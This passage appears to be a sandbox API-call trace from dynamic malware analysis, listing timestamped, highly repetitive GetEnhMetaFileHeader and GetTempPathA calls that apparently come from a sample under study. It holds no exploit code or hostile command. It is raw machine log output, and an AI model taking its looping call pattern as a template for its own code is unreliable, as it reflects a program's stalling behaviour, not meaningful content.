lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.530] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.531] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0097.618] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.619] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.620] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.621] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.622] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.623] GetTempPathA 